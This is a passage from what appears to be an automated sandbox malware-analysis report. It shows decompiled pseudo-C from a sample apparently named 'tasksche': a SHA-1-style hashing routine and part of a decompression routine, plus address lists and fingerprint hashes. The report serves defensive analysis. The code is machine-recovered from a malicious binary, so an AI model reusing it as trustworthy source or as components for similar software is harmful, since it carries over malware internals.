                                                                                              					_t422 = _t422 + 0xc;
                                                                                              				}
                                                                                              				if( *0x44f578 == 0) {
                                                                                              					_t333 = 0;
                                                                                              					_t420 = 0x44ef3c;
                                                                                              					do {
                                                                                              						_t5 = _t333 + 1; // 0x1
                                                                                              						asm("cdq");
                                                                                              						_t389 = 5;
                                                                                              						_t10 = _t333 + 2; // 0x2
                                                                                              						 *((intOrPtr*)(_t420 - 4)) = _t333;
                                                                                              						 *_t420 = _t5 % _t389;
                                                                                              						asm("cdq");
                                                                                              						_t16 = _t333 + 3; // 0x3
                                                                                              						_t420 =  &(_t420[5]);
                                                                                              						 *(_t420 - 0x10) = _t10 % _t389;
                                                                                              						asm("cdq");
                                                                                              						_t22 = _t333 + 4; // 0x4
                                                                                              						 *(_t420 - 0xc) = _t16 % _t389;
                                                                                              						asm("cdq");
                                                                                              						 *(_t420 - 8) = _t22 % _t389;
                                                                                              						if(_t333 == 0) {
                                                                                              							_t333 = 4;
                                                                                              						} else {
                                                                                              							_t333 = _t333 - 1;
                                                                                              						}
                                                                                              					} while (_t420 < 0x44f57c);
                                                                                              					 *0x44f578 = 1;
                                                                                              				}
                                                                                              				_t288 = 5;
                                                                                              				memcpy( &_v36, _a4, _t288 << 2);
                                                                                              				_t236 = 0x44ef44;
                                                                                              				_a16 = _t286;
                                                                                              				do {
                                                                                              					_t392 = _a16;
                                                                                              					asm("ror ecx, 0x8");
                                                                                              					asm("rol edx, 0x8");
                                                                                              					_t292 =  *_t392 & 0xff00ff00 |  *_t392 & 0x00ff00ff;
                                                                                              					 *_t392 = _t292;
                                                                                              					_t337 =  *(_t421 +  *_t236 * 4 - 0x20);
                                                                                              					_a16 = _a16 + 4;
                                                                                              					_a12 = _t421 +  *(_t236 - 8) * 4 - 0x20;
                                                                                              					_v8 = _t421 + _t236[1] * 4 - 0x20;
                                                                                              					_a8 = _t337;
                                                                                              					asm("rol esi, 0x5");
                                                                                              					_t62 =  *((intOrPtr*)(_t421 +  *(_t236 - 0xc) * 4 - 0x20)) + _t292 + 0x5a827999; // 0x5a827a75
                                                                                              					 *_v8 =  *_v8 + (( *(_t421 +  *(_t236 - 4) * 4 - 0x20) ^ _t337) &  *_a12 ^ _a8) + _t62;
                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                              					_t236 =  &(_t236[5]);
                                                                                              					_t340 = 0x44f084;
                                                                                              				} while (_t236 < 0x44f084);
                                                                                              				_a16 = 0x10;
                                                                                              				do {
                                                                                              					_t66 = _a16 - 3; // 0xd
                                                                                              					_t295 = _t66;
                                                                                              					_t400 = _t286 + (_a16 & 0x0000000f) * 4;
                                                                                              					_t69 = _t295 - 5; // 0x8
                                                                                              					_t72 = _t295 + 5; // 0x12
                                                                                              					_t244 =  *(_t286 + (_t69 & 0x0000000f) * 4) ^  *(_t286 + (_t72 & 0x0000000f) * 4) ^  *(_t286 + (_t66 & 0x0000000f) * 4) ^  *_t400;
                                                                                              					asm("rol eax, 1");
                                                                                              					 *_t400 = _t244;
                                                                                              					_t77 = _t340 - 8; // 0x0
                                                                                              					_t298 =  *(_t421 +  *_t340 * 4 - 0x20);
                                                                                              					_t81 = _t340 - 4; // 0x0
                                                                                              					_a12 = _t421 +  *_t77 * 4 - 0x20;
                                                                                              					_t89 =  &(_t340[1]); // 0x0
                                                                                              					_v8 = _t421 +  *_t89 * 4 - 0x20;
                                                                                              					_t94 = _t340 - 0xc; // 0x0
                                                                                              					_a8 = _t298;
                                                                                              					asm("rol esi, 0x5");
                                                                                              					_t103 =  *((intOrPtr*)(_t421 +  *_t94 * 4 - 0x20)) + _t244 + 0x5a827999; // 0x5a827a75
                                                                                              					 *_v8 =  *_v8 + (( *(_t421 +  *_t81 * 4 - 0x20) ^ _t298) &  *_a12 ^ _a8) + _t103;
                                                                                              					asm("ror dword [eax], 0x2");
                                                                                              					_a16 = _a16 + 1;
                                                                                              					_t340 =  &(_t340[5]);
                                                                                              				} while (_t340 < 0x44f0d4);
                                                                                              				_a16 = 0x14;
                                                                                              				_t341 = 0x44f0d4;
                                                                                              				do {
                                                                                              					_t109 = _a16 - 3; // 0x11
                                                                                              					_t301 = _t109;
                                                                                              					_t408 = _t286 + (_a16 & 0x0000000f) * 4;
                                                                                              					_t112 = _t301 - 5; // 0xc
                                                                                              					_t113 = _t301 + 5; // 0x16
                                                                                              					_t255 =  *(_t286 + (_t112 & 0x0000000f) * 4) ^  *(_t286 + (_t113 & 0x0000000f) * 4) ^  *(_t286 + (_t109 & 0x0000000f) * 4) ^  *_t408;
                                                                                              					asm("rol eax, 1");
                                                                                              					 *_t408 = _t255;
                                                                                              					_t120 = _t341 - 8; // 0x0
                                                                                              					_a12 = _t421 +  *_t120 * 4 - 0x20;
                                                                                              					_t125 =  &(_t341[1]); // 0x0
                                                                                              					_v8 = _t421 +  *_t125 * 4 - 0x20;
                                                                                              					_t130 = _t341 - 0xc; // 0x0
                                                                                              					_t134 = _t341 - 4; // 0x0
                                                                                              					asm("rol esi, 0x5");
                                                                                              					 *_v8 =  *_v8 + ( *(_t421 +  *_t134 * 4 - 0x20) ^  *(_t421 +  *_t341 * 4 - 0x20) ^  *_a12) +  *((intOrPtr*)(_t421 +  *_t130 * 4 - 0x20)) + _t255 + 0x6ed9eba1;
                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                              					_a16 = _a16 + 1;
                                                                                              					_t341 =  &(_t341[5]);
                                                                                              				} while (_t341 < 0x44f264);
                                                                                              				_t312 = 0x44f260;
                                                                                              				_a16 = 0x28;
                                                                                              				_a12 = 0x44f260;
                                                                                              				do {
                                                                                              					_t150 = _a16 - 3; // 0x25
                                                                                              					_t342 = _t150;
                                                                                              					_t412 = _t286 + (_a16 & 0x0000000f) * 4;
                                                                                              					_t153 = _t342 - 5; // 0x20
                                                                                              					_t156 = _t342 + 5; // 0x2a
                                                                                              					_t264 =  *(_t286 + (_t153 & 0x0000000f) * 4) ^  *(_t286 + (_t156 & 0x0000000f) * 4) ^  *(_t286 + (_t150 & 0x0000000f) * 4) ^  *_t412;
                                                                                              					asm("rol eax, 1");
                                                                                              					 *_t412 = _t264;
                                                                                              					_t161 = _t312 - 4; // 0x0
                                                                                              					_t162 =  &(_t312[2]); // 0x0
                                                                                              					_t345 = _t421 +  *_t161 * 4 - 0x20;
                                                                                              					_v16 = _t345;
                                                                                              					_t346 =  *_t345;
                                                                                              					_v12 = _t421 +  *_t162 * 4 - 0x20;
                                                                                              					_t174 = _t312 - 8; // 0x0
                                                                                              					_t175 =  &(_t312[1]); // 0x0
                                                                                              					_a8 = _t346;
                                                                                              					asm("rol edi, 0x5");
                                                                                              					 *_v12 =  *_v12 + ( *(_t421 +  *_t175 * 4 - 0x20) & (_t346 |  *(_t421 +  *_t312 * 4 - 0x20)) | _a8 &  *(_t421 +  *_t312 * 4 - 0x20)) +  *((intOrPtr*)(_t421 +  *_t174 * 4 - 0x20)) + _t264 - 0x70e44324;
                                                                                              					asm("ror dword [eax], 0x2");
                                                                                              					_a16 = _a16 + 1;
                                                                                              					_t312 =  &(_a12[5]);
                                                                                              					_a12 = _t312;
                                                                                              				} while (_t312 < 0x44f3f0);
                                                                                              				_a16 = 0x3c;
                                                                                              				_t350 = 0x44f3f4;
                                                                                              				do {
                                                                                              					_t194 = _a16 - 3; // 0x39
                                                                                              					_t320 = _t194;
                                                                                              					_t415 = _t286 + (_a16 & 0x0000000f) * 4;
                                                                                              					_t197 = _t320 - 5; // 0x34
                                                                                              					_t198 = _t320 + 5; // 0x3e
                                                                                              					_t274 =  *(_t286 + (_t197 & 0x0000000f) * 4) ^  *(_t286 + (_t198 & 0x0000000f) * 4) ^  *(_t286 + (_t194 & 0x0000000f) * 4) ^  *_t415;
                                                                                              					asm("rol eax, 1");
                                                                                              					 *_t415 = _t274;
                                                                                              					_t205 = _t350 - 8; // 0x0
                                                                                              					_a12 = _t421 +  *_t205 * 4 - 0x20;
                                                                                              					_t210 =  &(_t350[1]); // 0x0
                                                                                              					_v16 = _t421 +  *_t210 * 4 - 0x20;
                                                                                              					_t215 = _t350 - 0xc; // 0x0
                                                                                              					_t219 = _t350 - 4; // 0x0
                                                                                              					asm("rol esi, 0x5");
                                                                                              					 *_v16 =  *_v16 + ( *(_t421 +  *_t219 * 4 - 0x20) ^  *(_t421 +  *_t350 * 4 - 0x20) ^  *_a12) +  *((intOrPtr*)(_t421 +  *_t215 * 4 - 0x20)) + _t274 - 0x359d3e2a;
                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                              					_a16 = _a16 + 1;
                                                                                              					_t350 =  &(_t350[5]);
                                                                                              				} while (_t350 < 0x44f584);
                                                                                              				_t276 = _a4;
                                                                                              				_t332 =  &_v36 - _t276;
                                                                                              				_t351 = 5;
                                                                                              				do {
                                                                                              					 *_t276 =  *_t276 +  *((intOrPtr*)(_t332 + _t276));
                                                                                              					_t276 = _t276 + 4;
                                                                                              					_t351 = _t351 - 1;
                                                                                              				} while (_t351 != 0);
                                                                                              				return _t276;
                                                                                              			}









































                                                                                              0x00410185
                                                                                              0x0041019a
                                                                                              0x00410187
                                                                                              0x00410187
                                                                                              0x00410190
                                                                                              0x00410195
                                                                                              0x00410195
                                                                                              0x004101a4
                                                                                              0x004101a6
                                                                                              0x004101a8
                                                                                              0x004101ad
                                                                                              0x004101ad
                                                                                              0x004101b0
                                                                                              0x004101b3
                                                                                              0x004101b6
                                                                                              0x004101b9
                                                                                              0x004101bc
                                                                                              0x004101be
                                                                                              0x004101c1
                                                                                              0x004101c4
                                                                                              0x004101c7
                                                                                              0x004101ca
                                                                                              0x004101cd
                                                                                              0x004101d0
                                                                                              0x004101d3
                                                                                              0x004101d6
                                                                                              0x004101db
                                                                                              0x004101e2
                                                                                              0x004101dd
                                                                                              0x004101dd
                                                                                              0x004101dd
                                                                                              0x004101e3
                                                                                              0x004101eb
                                                                                              0x004101eb
                                                                                              0x004101f7
                                                                                              0x004101fb
                                                                                              0x004101fd
                                                                                              0x00410202
                                                                                              0x00410205
                                                                                              0x00410205
                                                                                              0x0041020c
                                                                                              0x00410215
                                                                                              0x0041021e
                                                                                              0x00410220
                                                                                              0x00410227
                                                                                              0x00410232
                                                                                              0x0041023a
                                                                                              0x00410246
                                                                                              0x00410250
                                                                                              0x00410258
                                                                                              0x00410263
                                                                                              0x0041026a
                                                                                              0x0041026f
                                                                                              0x00410272
                                                                                              0x00410275
                                                                                              0x0041027a
                                                                                              0x0041027e
                                                                                              0x00410285
                                                                                              0x00410288
                                                                                              0x00410288
                                                                                              0x0041028e
                                                                                              0x00410291
                                                                                              0x0041029a
                                                                                              0x004102a9
                                                                                              0x004102ab
                                                                                              0x004102ad
                                                                                              0x004102af
                                                                                              0x004102b4
                                                                                              0x004102b8
                                                                                              0x004102c3
                                                                                              0x004102c6
                                                                                              0x004102cf
                                                                                              0x004102d2
                                                                                              0x004102d9
                                                                                              0x004102e1
                                                                                              0x004102ec
                                                                                              0x004102f3
                                                                                              0x004102f8
                                                                                              0x004102fb
                                                                                              0x004102fe
                                                                                              0x00410306
                                                                                              0x0041030e
                                                                                              0x00410315
                                                                                              0x00410317
                                                                                              0x0041031a
                                                                                              0x0041031a
                                                                                              0x00410320
                                                                                              0x00410323
                                                                                              0x00410326
                                                                                              0x0041033b
                                                                                              0x0041033d
                                                                                              0x0041033f
                                                                                              0x00410341
                                                                                              0x0041034a
                                                                                              0x0041034d
                                                                                              0x00410354
                                                                                              0x00410357
                                                                                              0x0041035e
                                                                                              0x00410369
                                                                                              0x0041037f
                                                                                              0x00410381
                                                                                              0x00410384
                                                                                              0x00410387
                                                                                              0x0041038a
                                                                                              0x00410392
                                                                                              0x00410397
                                                                                              0x0041039e
                                                                                              0x004103a1
                                                                                              0x004103a4
                                                                                              0x004103a4
                                                                                              0x004103aa
                                                                                              0x004103ad
                                                                                              0x004103b6
                                                                                              0x004103c5
                                                                                              0x004103c7
                                                                                              0x004103c9
                                                                                              0x004103cb
                                                                                              0x004103ce
                                                                                              0x004103d7
                                                                                              0x004103df
                                                                                              0x004103e2
                                                                                              0x004103e4
                                                                                              0x004103e7
                                                                                              0x004103ea
                                                                                              0x004103f5
                                                                                              0x00410405
                                                                                              0x00410414
                                                                                              0x0041041c
                                                                                              0x0041041f
                                                                                              0x00410422
                                                                                              0x0041042b
                                                                                              0x0041042b
                                                                                              0x00410434
                                                                                              0x0041043b
                                                                                              0x00410440
                                                                                              0x00410443
                                                                                              0x00410443
                                                                                              0x00410449
                                                                                              0x0041044c
                                                                                              0x0041044f
                                                                                              0x00410464
                                                                                              0x00410466
                                                                                              0x00410468
                                                                                              0x0041046a
                                                                                              0x00410473
                                                                                              0x00410476
                                                                                              0x0041047d
                                                                                              0x00410480
                                                                                              0x00410487
                                                                                              0x00410492
                                                                                              0x004104a8
                                                                                              0x004104aa
                                                                                              0x004104ad
                                                                                              0x004104b0
                                                                                              0x004104b3
                                                                                              0x004104bb
                                                                                              0x004104c3
                                                                                              0x004104c5
                                                                                              0x004104c6
                                                                                              0x004104c9
                                                                                              0x004104cb
                                                                                              0x004104ce
                                                                                              0x004104ce
                                                                                              0x004104d5

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: <D$DD
                                                                                              • API String ID: 0-3036587789
                                                                                              • Opcode ID: a120047ceaa170e9019935171625ae5ad03bfb54992e95746f25c16dbdc0a917
                                                                                              • Instruction ID: 59a02f745f793eb532b4d9e305735a670a6f692f985c4356a20c5044c607aa25
                                                                                              • Opcode Fuzzy Hash: a120047ceaa170e9019935171625ae5ad03bfb54992e95746f25c16dbdc0a917
                                                                                              • Instruction Fuzzy Hash: E8D15D72A0061ACFCF14CF58D884599B3B1FF8C308B2685ADE919AB245D731BA56CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00417D78(void* __ecx, unsigned int _a4, char _a7) {
                                                                                              				unsigned int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				intOrPtr _t539;
                                                                                              				signed int _t540;
                                                                                              				unsigned int _t541;
                                                                                              				signed int _t544;
                                                                                              				signed int _t545;
                                                                                              				signed int _t547;
                                                                                              				unsigned int _t551;
                                                                                              				signed int _t553;
                                                                                              				intOrPtr* _t554;
                                                                                              				unsigned int _t556;
                                                                                              				signed int _t559;
                                                                                              				signed int _t560;
                                                                                              				signed int _t561;
                                                                                              				signed int _t562;
                                                                                              				unsigned int _t563;
                                                                                              				signed int _t566;
                                                                                              				signed int _t567;
                                                                                              				signed int _t568;
                                                                                              				signed int _t570;
                                                                                              				unsigned int _t571;
                                                                                              				unsigned int _t580;
                                                                                              				unsigned int _t582;
                                                                                              				signed int _t583;
                                                                                              				unsigned int _t584;
                                                                                              				signed int _t587;
                                                                                              				signed int _t588;
                                                                                              				signed int _t589;
                                                                                              				unsigned int _t590;
                                                                                              				signed int _t592;
                                                                                              				unsigned int _t593;
                                                                                              				unsigned int _t594;
                                                                                              				unsigned int _t595;
                                                                                              				signed int _t597;
                                                                                              				void* _t598;
                                                                                              				signed int _t601;
                                                                                              				signed int _t602;
                                                                                              				unsigned int _t603;
                                                                                              				signed int _t606;
                                                                                              				signed int _t607;
                                                                                              				unsigned int _t611;
                                                                                              				signed int _t613;
                                                                                              				unsigned int _t614;
                                                                                              				unsigned int _t616;
                                                                                              				unsigned int _t618;
                                                                                              				signed int _t619;
                                                                                              				unsigned int _t620;
                                                                                              				signed int _t623;
                                                                                              				signed int _t624;
                                                                                              				unsigned int _t625;
                                                                                              				signed int _t626;
                                                                                              				unsigned int _t627;
                                                                                              				signed int _t630;
                                                                                              				signed int _t631;
                                                                                              				signed int _t632;
                                                                                              				unsigned int _t633;
                                                                                              				unsigned int _t634;
                                                                                              				unsigned int _t635;
                                                                                              				signed int _t636;
                                                                                              				signed int _t637;
                                                                                              				signed int _t638;
                                                                                              				unsigned int _t639;
                                                                                              				signed int _t642;
                                                                                              				signed int _t643;
                                                                                              				signed int _t644;
                                                                                              				void* _t648;
                                                                                              				void* _t649;
                                                                                              				signed int _t651;
                                                                                              				unsigned int _t658;
                                                                                              				unsigned int _t660;
                                                                                              				signed char _t661;
                                                                                              				signed int _t662;
                                                                                              				signed int _t666;
                                                                                              				unsigned int _t667;
                                                                                              				unsigned int _t669;
                                                                                              				signed int _t671;
                                                                                              				intOrPtr _t673;
                                                                                              				signed int _t678;
                                                                                              				signed int _t680;
                                                                                              				signed int _t681;
                                                                                              				signed int _t684;
                                                                                              				signed int _t688;
                                                                                              				signed int _t689;
                                                                                              				unsigned int _t695;
                                                                                              				signed int _t696;
                                                                                              				intOrPtr* _t700;
                                                                                              				intOrPtr* _t702;
                                                                                              				signed int _t704;
                                                                                              				signed int _t706;
                                                                                              				unsigned int _t708;
                                                                                              				void* _t710;
                                                                                              				signed int _t715;
                                                                                              				void* _t723;
                                                                                              				unsigned int _t727;
                                                                                              				unsigned int _t730;
                                                                                              				void* _t732;
                                                                                              				signed int _t734;
                                                                                              				char* _t740;
                                                                                              				unsigned int _t741;
                                                                                              				void* _t743;
                                                                                              				intOrPtr* _t747;
                                                                                              				void* _t748;
                                                                                              				signed int _t751;
                                                                                              				signed int _t753;
                                                                                              				unsigned int _t759;
                                                                                              				unsigned int _t762;
                                                                                              				signed int _t766;
                                                                                              				unsigned int _t768;
                                                                                              				void* _t770;
                                                                                              				signed int _t772;
                                                                                              				signed int _t773;
                                                                                              				void* _t779;
                                                                                              				void* _t781;
                                                                                              				signed int _t787;
                                                                                              				void* _t789;
                                                                                              				intOrPtr* _t791;
                                                                                              				void* _t792;
                                                                                              				signed int _t795;
                                                                                              				void* _t798;
                                                                                              				void* _t803;
                                                                                              				signed int _t806;
                                                                                              				void* _t809;
                                                                                              				void* _t814;
                                                                                              				signed int _t817;
                                                                                              				void* _t825;
                                                                                              				signed int _t826;
                                                                                              				intOrPtr _t829;
                                                                                              				unsigned int _t831;
                                                                                              				unsigned int _t832;
                                                                                              				signed int _t834;
                                                                                              				unsigned int _t841;
                                                                                              				void* _t849;
                                                                                              				void* _t854;
                                                                                              				signed int _t855;
                                                                                              				intOrPtr _t858;
                                                                                              				unsigned int _t859;
                                                                                              				signed int _t860;
                                                                                              				signed int _t862;
                                                                                              				intOrPtr _t865;
                                                                                              				signed int _t877;
                                                                                              				intOrPtr _t880;
                                                                                              				signed int _t888;
                                                                                              				signed int _t890;
                                                                                              				intOrPtr _t893;
                                                                                              				signed int _t901;
                                                                                              				signed int _t902;
                                                                                              				signed int _t921;
                                                                                              				signed int _t923;
                                                                                              				intOrPtr _t926;
                                                                                              				intOrPtr* _t934;
                                                                                              				signed int _t935;
                                                                                              				void* _t936;
                                                                                              				void* _t937;
                                                                                              				void* _t938;
                                                                                              				void* _t953;
                                                                                              
                                                                                              				_t680 = 0;
                                                                                              				_t936 = __ecx;
                                                                                              				_t938 =  *0x44f6fc - _t680; // 0x0
                                                                                              				if(_t938 != 0) {
                                                                                              					L6:
                                                                                              					 *((char*)(_t936 + 0x4c58)) = 1;
                                                                                              					if( *((char*)(_t936 + 0x4c48)) != 0) {
                                                                                              						L11:
                                                                                              						_t934 = _t936 + 4;
                                                                                              						while(1) {
                                                                                              							L12:
                                                                                              							 *(_t936 + 0x70) =  *(_t936 + 0x70) &  *(_t936 + 0xe6dc);
                                                                                              							if( *_t934 >  *((intOrPtr*)(_t936 + 0x7c)) && E0041236D(_t683, _t936, _t852) == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t539 =  *((intOrPtr*)(_t936 + 0x74));
                                                                                              							_t704 =  *(_t936 + 0x70);
                                                                                              							_t852 = _t539 - _t704 &  *(_t936 + 0xe6dc);
                                                                                              							if((_t539 - _t704 &  *(_t936 + 0xe6dc)) >= 0x104 || _t539 == _t704) {
                                                                                              								L20:
                                                                                              								if( *(_t936 + 0xe654) != 1) {
                                                                                              									_t540 = E0040978C(_t934);
                                                                                              									_t681 =  *(_t936 + 0x118);
                                                                                              									_t541 = _t540 & 0x0000fffe;
                                                                                              									__eflags = _t541 -  *((intOrPtr*)(_t936 + 0x98 + _t681 * 4));
                                                                                              									if(_t541 >=  *((intOrPtr*)(_t936 + 0x98 + _t681 * 4))) {
                                                                                              										_t852 = 0xf;
                                                                                              										_t706 = _t681 + 1;
                                                                                              										__eflags = _t706 - _t852;
                                                                                              										if(_t706 >= _t852) {
                                                                                              											L90:
                                                                                              											_t708 =  *(_t934 + 4) + _t852;
                                                                                              											 *(_t934 + 4) = _t708 & 0x00000007;
                                                                                              											_t683 = _t708 >> 3;
                                                                                              											 *_t934 =  *_t934 + (_t708 >> 3);
                                                                                              											_t710 = 0x10;
                                                                                              											_t544 = (_t541 -  *((intOrPtr*)(_t936 + 0x94 + _t852 * 4)) >> _t710 - _t852) +  *((intOrPtr*)(_t936 + 0xd8 + _t852 * 4));
                                                                                              											__eflags = _t544 -  *((intOrPtr*)(_t936 + 0x94));
                                                                                              											if(_t544 >=  *((intOrPtr*)(_t936 + 0x94))) {
                                                                                              												_t544 = 0;
                                                                                              												__eflags = 0;
                                                                                              											}
                                                                                              											_t545 =  *(_t936 + 0xd1c + _t544 * 2) & 0x0000ffff;
                                                                                              											L93:
                                                                                              											__eflags = _t545 - 0x100;
                                                                                              											if(_t545 >= 0x100) {
                                                                                              												__eflags = _t545 - 0x10f;
                                                                                              												if(_t545 < 0x10f) {
                                                                                              													__eflags = _t545 - 0x100;
                                                                                              													if(__eflags != 0) {
                                                                                              														__eflags = _t545 - 0x101;
                                                                                              														if(__eflags != 0) {
                                                                                              															__eflags = _t545 - 0x102;
                                                                                              															if(_t545 != 0x102) {
                                                                                              																__eflags = _t545 - 0x107;
                                                                                              																if(_t545 >= 0x107) {
                                                                                              																	__eflags = _t545 - 0x110;
                                                                                              																	if(_t545 >= 0x110) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	_t547 =  *(_t545 + 0x430081) & 0x000000ff;
                                                                                              																	_t683 = ( *(_t545 + 0x430089) & 0x000000ff) + 1;
                                                                                              																	_a4 = _t547;
                                                                                              																	__eflags = _t547;
                                                                                              																	if(_t547 > 0) {
                                                                                              																		_t556 = E0040978C(_t934);
                                                                                              																		_t723 = 0x10;
                                                                                              																		_t683 = _t683 + (_t556 >> _t723 - _a4);
                                                                                              																		_t559 =  *(_t934 + 4) + _a4;
                                                                                              																		 *_t934 =  *_t934 + (_t559 >> 3);
                                                                                              																		_t560 = _t559 & 0x00000007;
                                                                                              																		__eflags = _t560;
                                                                                              																		 *(_t934 + 4) = _t560;
                                                                                              																	}
                                                                                              																	_t715 =  *(_t936 + 0x70);
                                                                                              																	 *(_t936 + 0x60) =  *(_t936 + 0x5c);
                                                                                              																	 *(_t936 + 0x5c) =  *(_t936 + 0x58);
                                                                                              																	 *(_t936 + 0x58) =  *(_t936 + 0x54);
                                                                                              																	_t551 = 2;
                                                                                              																	 *(_t936 + 0x68) = _t551;
                                                                                              																	_a4 = _t551;
                                                                                              																	_t553 = _t715 - _t683;
                                                                                              																	_t854 =  *((intOrPtr*)(_t936 + 0xe6d8)) + 0xffffefff;
                                                                                              																	 *(_t936 + 0x54) = _t683;
                                                                                              																	__eflags = _t553 - _t854;
                                                                                              																	if(_t553 >= _t854) {
                                                                                              																		L218:
                                                                                              																		_t855 =  *(_t936 + 0xe6dc);
                                                                                              																		do {
                                                                                              																			_t683 =  *(_t936 + 0x70);
                                                                                              																			_a4 = _a4 - 1;
                                                                                              																			 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t855 & _t553) +  *((intOrPtr*)(_t936 + 0x4b34))));
                                                                                              																			_t855 =  *(_t936 + 0xe6dc);
                                                                                              																			_t553 = _t553 + 1;
                                                                                              																			__eflags = _a4;
                                                                                              																			 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t855;
                                                                                              																		} while (_a4 > 0);
                                                                                              																	} else {
                                                                                              																		__eflags = _t715 - _t854;
                                                                                              																		if(_t715 >= _t854) {
                                                                                              																			goto L218;
                                                                                              																		}
                                                                                              																		_t858 =  *((intOrPtr*)(_t936 + 0x4b34));
                                                                                              																		_t554 = _t553 + _t858;
                                                                                              																		_t852 = _t858 + _t715;
                                                                                              																		 *(_t936 + 0x70) = _t715 + 2;
                                                                                              																		 *_t852 =  *_t554;
                                                                                              																		 *(_t852 + 1) =  *((intOrPtr*)(_t554 + 1));
                                                                                              																	}
                                                                                              																	continue;
                                                                                              																}
                                                                                              																_t561 = _t545 + 0xfffffefd;
                                                                                              																_t727 = _t936 + 0x54 + _t561 * 4;
                                                                                              																_t859 =  *_t727;
                                                                                              																_v12 = _t859;
                                                                                              																while(1) {
                                                                                              																	__eflags = _t561;
                                                                                              																	if(_t561 <= 0) {
                                                                                              																		break;
                                                                                              																	}
                                                                                              																	 *_t727 =  *(_t727 - 4);
                                                                                              																	_t561 = _t561 - 1;
                                                                                              																	_t727 = _t727 - 4;
                                                                                              																	__eflags = _t727;
                                                                                              																}
                                                                                              																 *(_t936 + 0x54) = _t859;
                                                                                              																_t562 = E0040978C(_t934);
                                                                                              																_t688 =  *(_t936 + 0x2ddc);
                                                                                              																_t563 = _t562 & 0x0000fffe;
                                                                                              																__eflags = _t563 -  *((intOrPtr*)(_t936 + 0x2d5c + _t688 * 4));
                                                                                              																if(_t563 >=  *((intOrPtr*)(_t936 + 0x2d5c + _t688 * 4))) {
                                                                                              																	_t860 = 0xf;
                                                                                              																	_t689 = _t688 + 1;
                                                                                              																	__eflags = _t689 - _t860;
                                                                                              																	if(_t689 >= _t860) {
                                                                                              																		L185:
                                                                                              																		_t730 =  *(_t934 + 4) + _t860;
                                                                                              																		 *(_t934 + 4) = _t730 & 0x00000007;
                                                                                              																		 *_t934 =  *_t934 + (_t730 >> 3);
                                                                                              																		_t732 = 0x10;
                                                                                              																		_t566 = (_t563 -  *((intOrPtr*)(_t936 + 0x2d58 + _t860 * 4)) >> _t732 - _t860) +  *((intOrPtr*)(_t936 + 0x2d9c + _t860 * 4));
                                                                                              																		__eflags = _t566 -  *((intOrPtr*)(_t936 + 0x2d58));
                                                                                              																		if(_t566 >=  *((intOrPtr*)(_t936 + 0x2d58))) {
                                                                                              																			_t566 = 0;
                                                                                              																			__eflags = 0;
                                                                                              																		}
                                                                                              																		_t567 =  *(_t936 + 0x39e0 + _t566 * 2) & 0x0000ffff;
                                                                                              																		L188:
                                                                                              																		_t568 =  *(_t567 + 0x430198) & 0x000000ff;
                                                                                              																		_t683 = ( *(_t567 + 0x4301b4) & 0x000000ff) + 2;
                                                                                              																		_v16 = _t683;
                                                                                              																		_a4 = _t568;
                                                                                              																		__eflags = _t568;
                                                                                              																		if(_t568 > 0) {
                                                                                              																			_t584 = E0040978C(_t934);
                                                                                              																			_t743 = 0x10;
                                                                                              																			_t683 = _t683 + (_t584 >> _t743 - _a4);
                                                                                              																			_t587 =  *(_t934 + 4) + _a4;
                                                                                              																			_v16 = _t683;
                                                                                              																			 *_t934 =  *_t934 + (_t587 >> 3);
                                                                                              																			_t588 = _t587 & 0x00000007;
                                                                                              																			__eflags = _t588;
                                                                                              																			 *(_t934 + 4) = _t588;
                                                                                              																		}
                                                                                              																		_t734 =  *(_t936 + 0x70);
                                                                                              																		_t570 = _t734 - _v12;
                                                                                              																		_t852 =  *((intOrPtr*)(_t936 + 0xe6d8)) + 0xffffefff;
                                                                                              																		 *(_t936 + 0x68) = _t683;
                                                                                              																		_a4 = _t683;
                                                                                              																		__eflags = _t570 - _t852;
                                                                                              																		if(_t570 >= _t852) {
                                                                                              																			L208:
                                                                                              																			__eflags = _t683;
                                                                                              																			if(_t683 <= 0) {
                                                                                              																				continue;
                                                                                              																			}
                                                                                              																			_t862 =  *(_t936 + 0xe6dc);
                                                                                              																			do {
                                                                                              																				_t683 =  *(_t936 + 0x70);
                                                                                              																				_a4 = _a4 - 1;
                                                                                              																				 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t862 & _t570) +  *((intOrPtr*)(_t936 + 0x4b34))));
                                                                                              																				_t862 =  *(_t936 + 0xe6dc);
                                                                                              																				_t570 = _t570 + 1;
                                                                                              																				__eflags = _a4;
                                                                                              																				 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t862;
                                                                                              																			} while (_a4 > 0);
                                                                                              																			continue;
                                                                                              																		} else {
                                                                                              																			__eflags = _t734 - _t852;
                                                                                              																			if(_t734 >= _t852) {
                                                                                              																				goto L208;
                                                                                              																			}
